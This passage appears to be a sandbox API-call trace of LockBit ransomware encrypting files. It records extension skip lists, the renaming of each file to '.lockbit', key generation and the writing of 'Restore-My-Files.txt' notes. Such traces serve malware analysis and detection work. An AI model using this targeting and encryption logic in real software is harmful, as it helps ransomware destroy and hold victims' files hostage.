(lpString1=".qry", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0155.203] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0155.203] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG.lockbit") returned 72 [0155.204] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287644.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0155.205] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.205] malloc (_Size=0x40068) returned 0x3df0008 [0155.205] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17349) returned 1 [0155.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0155.206] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0155.206] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0155.211] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.211] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.211] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.212] free (_Block=0x1fa2ed8) [0155.212] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.212] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.212] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5a2e300, ftCreationTime.dwHighDateTime=0x1bf58da, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd5a2e300, ftLastWriteTime.dwHighDateTime=0x1bf58da, nFileSizeHigh=0x0, nFileSizeLow=0x8d86, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287645.JPG", cAlternateFileName="")) returned 1 [0155.213] lstrcmpiW (lpString1=".", lpString2="J0287645.JPG") returned -1 [0155.213] lstrcmpiW (lpString1="..", lpString2="J0287645.JPG") returned -1 [0155.213] PathFindExtensionW (pszPath="J0287645.JPG") returned=".JPG" [0155.213] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0155.213] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0155.213] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0155.213] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0155.213] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0155.213] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0155.213] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0155.213] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0155.213] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0155.214] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0155.214] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0155.214] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0155.214] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0155.214] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0155.214] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0155.214] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0155.214] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0155.214] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0155.215] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0155.215] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0155.215] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0155.215] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0155.215] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0155.215] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0155.215] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0155.215] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0155.215] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0155.215] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287645.JPG") returned 1 [0155.215] lstrcmpiW (lpString1="ntldr", lpString2="J0287645.JPG") returned 1 [0155.215] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287645.JPG") returned 1 [0155.215] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287645.JPG") returned -1 [0155.215] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287645.JPG") returned -1 [0155.215] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287645.JPG") returned 1 [0155.215] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287645.JPG") returned -1 [0155.215] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.215] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG") returned=".JPG" [0155.215] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0155.215] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0155.215] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0155.215] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0155.216] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0155.216] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0155.217] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0155.217] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0155.217] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG.lockbit") returned 72 [0155.217] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287645.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0155.222] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.222] malloc (_Size=0x40068) returned 0x1ff1e60 [0155.222] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=36230) returned 1 [0155.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0155.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0155.223] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0155.226] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.226] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.226] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.228] free (_Block=0x1fa2ed8) [0155.228] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.228] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.228] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.228] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2d21, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0289430.JPG", cAlternateFileName="")) returned 1 [0155.228] lstrcmpiW (lpString1=".", lpString2="J0289430.JPG") returned -1 [0155.228] lstrcmpiW (lpString1="..", lpString2="J0289430.JPG") returned -1 [0155.228] PathFindExtensionW (pszPath="J0289430.JPG") returned=".JPG" [0155.228] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0155.228] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0155.228] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0155.228] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0155.228] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0155.228] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0155.228] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0155.228] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0155.228] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0155.228] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0155.228] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0155.228] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0155.228] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0155.228] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0155.229] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0155.229] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0155.230] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0155.230] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0155.230] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0155.230] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0289430.JPG") returned 1 [0155.230] lstrcmpiW (lpString1="ntldr", lpString2="J0289430.JPG") returned 1 [0155.230] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0289430.JPG") returned 1 [0155.230] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0289430.JPG") returned -1 [0155.230] lstrcmpiW (lpString1="autorun.inf", lpString2="J0289430.JPG") returned -1 [0155.230] lstrcmpiW (lpString1="thumbs.db", lpString2="J0289430.JPG") returned 1 [0155.230] lstrcmpiW (lpString1="iconcache.db", lpString2="J0289430.JPG") returned -1 [0155.230] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0155.230] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG") returned=".JPG" [0155.230] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0155.230] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0155.230] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0155.230] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0155.231] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0155.231] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0155.231] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0155.231] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0155.231] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0155.231] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0155.231] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG.lockbit") returned 72 [0155.231] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0289430.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0155.232] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0155.232] malloc (_Size=0x40068) returned 0x3d70450 [0155.232] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=11553) returned 1 [0155.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0155.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0155.234] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0155.239] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0155.239] malloc (_Size=0xa6) returned 0x1fa2ed8 [0155.239] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0155.241] free (_Block=0x1fa2ed8) [0155.241] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0155.241] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0155.241] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0155.241] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5668dad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9e8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0290548.WMF", cAlternateFileName="")) returned 1 [0155.241] lstrcmpiW (lpString1=".", lpString2="J0290548.WMF") returned -1 [0155.241] lstrcmpiW (lpString1="..", lpString2="J0290548.WMF") returned -1 [0155.241] PathFindExtensionW (pszPath="J0290548.WMF") returned=".WMF" [0155.241] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0155.241] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0155.241] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0155.241] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0155.241] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0155.241] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0155.241] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0155.242] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0155.243] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0155.243] 